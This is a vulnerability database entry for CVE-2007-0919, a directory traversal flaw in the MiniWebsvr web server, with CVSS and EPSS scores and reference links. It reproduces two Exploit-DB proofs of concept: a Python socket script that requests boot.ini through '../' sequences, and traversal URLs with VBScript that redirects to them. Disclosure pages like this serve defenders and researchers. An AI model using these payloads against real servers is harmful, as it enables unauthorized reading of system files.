CVE-2007-0919
published 2007-02-14CVE-2007-0919: Directory traversal vulnerability in Nickolas Grigoriadis Mini Web server (MiniWebsvr) 0.0.6 allows remote attackers to list the directory immediately above…
PriorityP340high7.8CVSS 2.0
AVNACLAuNCCINAN
EXPLOIT
EPSS
3.65%
88.2th percentile
Directory traversal vulnerability in Nickolas Grigoriadis Mini Web server (MiniWebsvr) 0.0.6 allows remote attackers to list the directory immediately above the web root via a ..%00 sequence in the URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nickolas_grigoriadis | mini_web_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MiniWebsvr 0.0.9a - Remote Directory Traversal
exploitdb·2008-03-03
CVE-2007-0919 MiniWebsvr 0.0.9a - Remote Directory Traversal
MiniWebsvr 0.0.9a - Remote Directory Traversal
---
import socket
import sys
print '---------------------------------------------------------'
print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability'
print 'Project URL: http://miniwebsvr.sourceforge.net/'
print 'Author: gbr'
print 'Tested on Windows XP SP2'
print '---------------------------------------------------------'
host = "127.0.0.1"
port = 8080
if sys.argv[1:]:
host = sys.argv[1]
if sys.argv[2:]:
port = int(sys.argv[2])
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n")
while True:
data = s.recv(4096)
if not data:
break
print data
except:
print "Connection Error"
# milw0rm.com [2008-03-03]
Exploit-DB
MiniWebsvr 0.0.7 - Remote Directory Traversal
exploitdb·2007-04-11
CVE-2007-0919 MiniWebsvr 0.0.7 - Remote Directory Traversal
MiniWebsvr 0.0.7 - Remote Directory Traversal
---
MiniWebsvr 0.0.7 Directory transversal vulnerability
url: http://miniwebsvr.sourceforge.net/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini or
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../
Host Port
Sub GetBoot
on error resume next
document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini"
end sub
Sub BrowseMe
on error resume next
document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../"
end sub
# milw0rm.com [2007-04-11]
No writeups or analysis indexed.
http://attrition.org/pipermail/vim/2007-February/001315.htmlhttp://osvdb.org/33513http://securityreason.com/securityalert/2248http://www.securityfocus.com/archive/1/459829/100/0/threadedhttp://www.securityfocus.com/bid/22523https://exchange.xforce.ibmcloud.com/vulnerabilities/32451http://attrition.org/pipermail/vim/2007-February/001315.htmlhttp://osvdb.org/33513http://securityreason.com/securityalert/2248http://www.securityfocus.com/archive/1/459829/100/0/threadedhttp://www.securityfocus.com/bid/22523https://exchange.xforce.ibmcloud.com/vulnerabilities/32451
2007-02-14
Published